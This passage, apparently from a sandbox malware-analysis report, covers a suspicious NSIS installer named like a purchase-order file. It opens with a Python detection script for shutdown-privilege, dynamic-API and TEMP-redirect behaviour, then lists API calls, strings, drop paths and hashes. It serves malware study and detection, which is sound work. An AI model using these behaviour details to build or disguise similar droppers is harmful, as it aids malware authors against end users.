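            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
            # callee is set when the call happens inside a subroutine of this function
            "callee": int(m.group("callee"), 16) if m.group("callee") else None,
        })
    return records


def _find(records: List[Dict], api: str) -> List[Dict]:
    return [r for r in records if r["api"] == api]


def _in_address_order(*refs: int) -> bool:
    return all(a < b for a, b in zip(refs, refs[1:]))


# Win32 ExitWindowsEx uFlags bits (EWX_LOGOFF is 0 and therefore the absence of these).
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE", 0x8: "EWX_POWEROFF"}


def shutdown_capability(records: List[Dict]) -> Optional[Dict]:
    """LookupPrivilegeValueA(SeShutdownPrivilege) -> AdjustTokenPrivileges -> ExitWindowsEx,
    required in increasing address order; returns the decoded ExitWindowsEx flags or None."""
    lookup = [r for r in _find(records, "LookupPrivilegeValueA") if "SeShutdownPrivilege" in r["args"]]
    adjust = _find(records, "AdjustTokenPrivileges")
    exitwx = _find(records, "ExitWindowsEx")
    if not (lookup and adjust and exitwx):
        return None
    if not _in_address_order(lookup[0]["ref"], adjust[0]["ref"], exitwx[0]["ref"]):
        return None
    flags = int(exitwx[0]["args"][0], 16) if exitwx[0]["args"] else 0
    return {"flags": [name for bit, name in EWX_FLAGS.items() if flags & bit], "ref": exitwx[0]["ref"]}


def dynamic_api_resolution(records: List[Dict]) -> bool:
    """GetProcAddress fed by GetModuleHandle/LoadLibrary, counting calls made in subroutines too."""
    loaders = ("GetModuleHandleA", "LoadLibraryA", "LoadLibraryExA")
    return bool(_find(records, "GetProcAddress")) and any(r["api"] in loaders for r in records)


def temp_override(records: List[Dict]) -> Dict[str, str]:
    """SetEnvironmentVariableA calls that redirect TEMP or TMP; returns var -> new path."""
    out = {}
    for r in _find(records, "SetEnvironmentVariableA"):
        if len(r["args"]) >= 2 and r["args"][0] in ("TEMP", "TMP"):
            out[r["args"][0]] = r["args"][1]
    return out


def summarize(text: str) -> Dict:
    recs = parse_api_lines(text)
    return {
        "calls": len(recs),
        "modules": sorted({r["module"] for r in recs}),
        "shutdown": shutdown_capability(recs),
        "dynamic_api": dynamic_api_resolution(recs),
        "temp_override": temp_override(recs),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_APIS), indent=2))
```

Running the block on the sample reports EWX_REBOOT (uFlags 0x2) at 00403589, dynamic resolution via the 004060A5 subcall, and both TEMP and TMP pointed at the sandbox's Temp directory. The order check matters when the same list is fed from other functions: the stub's uninstaller and dialog code also import token and window APIs, and without the address ordering a loose co-occurrence rule would flag them too.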
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                      • String ID (the report joins these with `$`; listed one per line here):
                                                                        • "
                                                                        • "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"
                                                                        • .tmp
                                                                        • 1033
                                                                        • C:\Users\user\AppData\Local\Temp\
                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne
                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes
                                                                        • C:\Users\user\Desktop
                                                                        • C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                        • Error launching installer
                                                                        • Low
                                                                        • NSIS Error
                                                                        • Regangen Setup
                                                                        • SeShutdownPrivilege
                                                                        • TEMP
                                                                        • TMP
                                                                        • UXTHEME
                                                                        • \Temp
                                                                        • `KXu
                                                                        • ~nsu
                                                                      • API String ID: 3329125770-3841515056
                                                                      • Opcode ID: c6611ae9ac11e23741c835f25bc01884f32e14d02a86914436eec919e11b29ea
                                                                      • Instruction ID: 9f005f8ea334ebed05284af4b2fd35d6cfc3abe5f946e81cdcf7347df6e605c8
                                                                      • Opcode Fuzzy Hash: c6611ae9ac11e23741c835f25bc01884f32e14d02a86914436eec919e11b29ea
                                                                      • Instruction Fuzzy Hash: 02C1D7705082816AE7116F75AD4DA2F7EACAF8634AF04457FF541B61E2CB7C4A048B2E

                                                                      Control-flow Graph (graph rendering not reproduced; basic blocks 405063-4053e6, API calls listed under APIs below)
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000403), ref: 004050C2
                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004050D1
                                                                      • GetClientRect.USER32(?,?), ref: 0040510E
                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405115
                                                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
                                                                      • ShowWindow.USER32(?,00000008), ref: 004051B1
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004051D2
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004050E0
                                                                        • Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405223
                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405238
                                                                      • ShowWindow.USER32(00000000), ref: 0040525B
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405262
                                                                      • ShowWindow.USER32(00000008), ref: 004052A8
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
                                                                      • CreatePopupMenu.USER32 ref: 004052ED
                                                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
                                                                      • GetWindowRect.USER32(?,000000FF), ref: 00405322
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
                                                                      • OpenClipboard.USER32(00000000), ref: 00405387
                                                                      • EmptyClipboard.USER32 ref: 0040538D
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
                                                                      • GlobalLock.KERNEL32(00000000), ref: 004053A0
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004053CD
                                                                      • SetClipboardData.USER32(00000001,00000000), ref: 004053D8
                                                                      • CloseClipboard.USER32 ref: 004053DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID: @y
                                                                      • API String ID: 590372296-2793234042
                                                                      • Opcode ID: 0828e4ab056fce552cf715ec8d8979d73b4670e4ee89d676b692d6c801451d4a
                                                                      • Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
                                                                      • Opcode Fuzzy Hash: 0828e4ab056fce552cf715ec8d8979d73b4670e4ee89d676b692d6c801451d4a
                                                                      • Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69

                                                                      Control-flow Graph (graph rendering not reproduced; basic blocks 405d2e-405f74, API calls listed under APIs below)
                                                                      APIs
                                                                      • GetVersion.KERNEL32(00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000), ref: 00405DDF
                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E6D
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405EA9
                                                                      • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405EB7
                                                                      • CoTaskMemFree.OLE32(0078FCF8), ref: 00405EC2
                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
                                                                      • lstrlenA.KERNEL32(Call,00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll,00000000), ref: 00405F36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-118236429
                                                                      • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                      • Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
                                                                      • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                      • Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E
                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                      • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                      • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                      • String ID:
                                                                      • API String ID: 4227406936-0
                                                                      • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                      • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                      • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

                                                                      Control-flow Graph (graph rendering not reproduced; basic blocks 4055ae-40577b, API calls listed under APIs below)
                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055D7
                                                                      • lstrcatA.KERNEL32(Frbids.tal,\*.*,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040561F
                                                                      • lstrcatA.KERNEL32(?,00409014,?,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405640
                                                                      • lstrlenA.KERNEL32(?,?,00409014,?,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405646
                                                                      • FindFirstFileA.KERNELBASE(Frbids.tal,?,?,?,00409014,?,Frbids.tal,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405657
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
                                                                      • FindClose.KERNEL32(00000000), ref: 00405715
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$C:\Users\user\AppData\Local\Temp\$Frbids.tal$\*.*
                                                                      • API String ID: 2035342205-1027846086
                                                                      • Opcode ID: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                      • Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
                                                                      • Opcode Fuzzy Hash: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                      • Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E
                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(75573410,0079FD90,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,004058AF,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 0040601B
                                                                      • FindClose.KERNEL32(00000000), ref: 00406027
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsq8002.tmp, xrefs: 00406010
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 2295610775-2063696683
                                                                      • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                      • Instruction ID: 592bcfe3733b0aa744bdfcff45d7cd7e76fdd068ce72c1f71716353b7d55c377
                                                                      • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                      • Instruction Fuzzy Hash: 02D012319491305BC714977C7D4C84F7A6C9B193717114A32F46AF12E0C6749CA286E9

                                                                       Control-flow Graph: [graph rendering omitted]
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
                                                                      • ShowWindow.USER32(?), ref: 00403A77
                                                                      • DestroyWindow.USER32 ref: 00403A8B
                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
                                                                      • GetDlgItem.USER32(?,?), ref: 00403AC8
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403AE3
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403B91
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403B9B
                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C06
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403CAC
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403CCD
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CDF
                                                                      • EnableWindow.USER32(?,?), ref: 00403CFA
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403D17
                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
                                                                      • lstrlenA.KERNEL32(0079E540,?,0079E540,Regangen Setup), ref: 00403D6B
                                                                      • SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403EAE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID: @y$Regangen Setup
                                                                      • API String ID: 3282139019-3144617067
                                                                      • Opcode ID: f91631ea6a7899119ed47f58db1b72be55114eb3759132e365ec33f9056147a3
                                                                      • Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
                                                                      • Opcode Fuzzy Hash: f91631ea6a7899119ed47f58db1b72be55114eb3759132e365ec33f9056147a3
                                                                      • Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E

                                                                       Control-flow Graph: [graph rendering omitted]
                                                                      APIs
                                                                        • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                        • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                      • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe",00000000), ref: 00403707
                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,75573410), ref: 0040377C
                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 0040379A
                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne), ref: 004037E3
                                                                        • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                      • RegisterClassA.USER32(007A16E0), ref: 00403820
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 004038A3
                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
                                                                      • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
                                                                      • RegisterClassA.USER32(007A16E0), ref: 004038E5
                                                                      • DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                       • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
